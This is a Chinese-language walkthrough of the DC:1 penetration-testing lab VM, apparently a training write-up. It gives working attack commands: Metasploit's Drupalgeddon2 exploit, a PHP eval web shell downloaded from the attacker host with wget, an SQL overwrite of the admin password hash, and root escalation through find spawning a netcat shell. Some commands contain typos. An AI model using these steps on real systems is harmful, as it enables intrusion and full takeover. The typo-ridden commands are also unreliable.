DC:1渗透测试

DC1 渗透测试

实验环境:

靶机:DC:1 点击下载

攻击机:kali,win10

实验步骤:

  1. 安装靶机
  2. 信息收集
  3. 漏洞利用
  4. 提权

实验开始:

1
2
3
4
5
下载靶机
安装靶机
使用靶机OVA文件在vmvara安装
修改靶机网络
进入单用户模式重启靶机
信息收集
1
2
3
ip收集
arp-scan -l;
nmap -sV 192.168.10.18
指纹查询
1
使用浏览器插件wappalyzer查cms

image

相关漏洞搜寻

1
msfconsolesearch drupal

漏洞利用

1
2
3
4
5
6
msf攻击
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOST=192.168.10.18
explit
shell
python -c "import pty;pty.spwan('/bin/sh')"
上传PHP木马
1
2
3
4
5
6
先在kali上启动apache2
vim /var/www/test.txt
<?php eval($_POST['key']);?>
在会到msf中
wget http://192.168.10.17/test.txt
cp test.txt test.php
蚁剑链接

image

查看配置文件
1
2
3
目录中有一个flag1.txt
在配置文件中有一个flag2
根据提示访问数据库
查看数据库
1
2
利用蚁剑可以直接连接可以直接看到user
得知password被加密,如果需要改密码就要进行同样的加密
修改password-hash.sh
1
2
在蚁剑中执行的时候产生了报错报错的行在8384
我把文件的路径改后就能正常执行了
执行password-hash.sh
1
./password-hash.sh root
修改数据数据

在执行过脚本之后就产生了一串hash值可以直接添加进表中

1
update users set password = '$S$DOjcjhOiiHtadIneTwIvHAHacQ2dXVvF9xG8Mi8.h8dLGndJMZJY' where uid='1';

image

登录主页查看flag3

image

1
2
3
主机信息收集进入home得到flag4
cd /home/flag4
cat fla*

image

提权,拿最终flag
1
2
3
4
5
6
7
使用find+netcat 
提权蚁剑:
find / -exec netcat -lvp 5555 -e '/bin/sh'\;
kali: nc 192.168.10.18 5555
cd /root/
ls
cat thi*

image

——实验结束——

查看评论